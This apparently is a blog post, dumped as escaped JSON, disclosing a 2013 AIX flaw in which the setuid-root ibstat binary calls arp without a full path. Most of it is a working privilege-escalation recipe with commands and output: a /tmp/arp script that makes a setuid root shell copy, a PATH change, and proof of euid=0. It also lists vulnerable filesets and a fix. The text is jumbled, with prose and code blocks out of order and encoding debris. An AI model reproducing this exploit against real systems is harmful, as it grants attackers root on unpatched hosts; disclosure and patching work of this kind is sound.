In July 2013 we saw a new vulnerabilite on AIX, it’s possible to allow local users to gain privileges with a very simple way.<\/p>\n
The fail is due to a programming error in ibstat command After hunts, the real binary is \/usr\/sbin\/ibstat, and is setuid bit!<\/p>\n With a simple string command, we can see which command the binary use As we can see, all command are not call with her full path! So, we can exploit it easilly.<\/p>\n We place ourselves in the tmp directory And we create a script with the name of one command use in ibstat binary, his goal is just copy the shell binary in \/tmp and set setuit bit #!\/bin\/sh<\/p>\n cp \/bin\/sh \/tmp\/root Don’t forget to set executable bit on the script After, we change the PATH environnement variable: And launch ibstat command ERROR: “\/dev\/en0”: open failed rc=2, errno=2 =============================================================================== \/tmp\/arp script is launch by ibstat command, this command have root owner and setuid bit, so it execute witch root priviliges, and lauch our script witch root privilege too \ud83d\ude42<\/p>\n ibstat command is in devices.common.IBM.ib.rte fileset<\/p>\n The following fileset levels are vulnerable:<\/p>\n You must upgrade your system, or install thie fix<\/p>\n Rock it!<\/p>\n","protected":false},"excerpt":{"rendered":" In July 2013 we saw a new vulnerabilite on AIX, it’s possible to allow local users to gain privileges with a very simple way. The fail is due to a programming error in ibstat command (futex@aixbox) $ which ibstat \/usr\/bin\/ibstat … Continue reading
\n
\n(futex@aixbox) $ which ibstat
\n\/usr\/bin\/ibstat
\n(futex@aixbox) $ ls -l \/usr\/bin\/ibstat
\nlrwxrwxrwx\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 1 root\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 bin\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 16 01 oct 02:18 \/usr\/bin\/ibstat -> \/usr\/sbin\/ibstat
\n(futex@aixbox) $ ls -l \/usr\/sbin\/ibstat
\n-r-sr-xr-x\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 1 root\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 bin\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 47388 12 nov 2012\u00c2\u00a0 \/usr\/sbin\/ibstat
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ strings \/usr\/sbin\/ibstat | grep ifconfig
\nifconfig %s
\n(futex@aixbox) $ strings \/usr\/sbin\/ibstat | grep arp
\narp -t ib -a
\n(futex@aixbox) $ strings \/usr\/sbin\/ibstat | grep lsattr
\nlsattr -El %s
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ cd \/tmp
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ vi arp<\/p>\n
\nchown root \/tmp\/root
\nchmod 4755 \/tmp\/root
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ chmod 755 .\/arp
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ PATH=.:${PATH}
\n(futex@aixbox) $ which arp
\n.\/arp
\n<\/code><\/p>\n
\n
\n(futex@aixbox) $ ibstat -a -i en0<\/code><\/p>\n
\nCheck device state of “icm” and “en0”.<\/p>\n
\nIB INTERFACE ARP TABLE
\n===============================================================================<\/p>\n
\n(futex@aixbox) $ ls -l \/tmp\/root
\n-rwsr-xr-x\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 1 root\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 sys\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 292606 14 oct 10:48 \/tmp\/root
\n(futex@aixbox) $ id
\nuid=1001(futex) gid=3(sys)
\n(futex@aixbox) $ .\/root
\n(futex@aixbox) $ id
\nuid=1001(futex) gid=3(sys) euid=0(root)
\n<\/code><\/p>\n
\nAIX Fileset Lower Level Upper Level
\n-------------------------------------------------------
\ndevices.common.IBM.ib.rte 6.1.6.0 6.1.6.21
\ndevices.common.IBM.ib.rte 6.1.7.0 6.1.7.18
\ndevices.common.IBM.ib.rte 6.1.8.0 6.1.8.15
\ndevices.common.IBM.ib.rte 7.1.0.0 7.1.0.21
\ndevices.common.IBM.ib.rte 7.1.1.0 7.1.1.18
\ndevices.common.IBM.ib.rte 7.1.2.0 7.1.2.15
\n<\/code><\/p>\n
\nftp:\/\/aix.software.ibm.com\/aix\/efixes\/security\/infiniband_fix.tar
\n<\/code><\/p>\n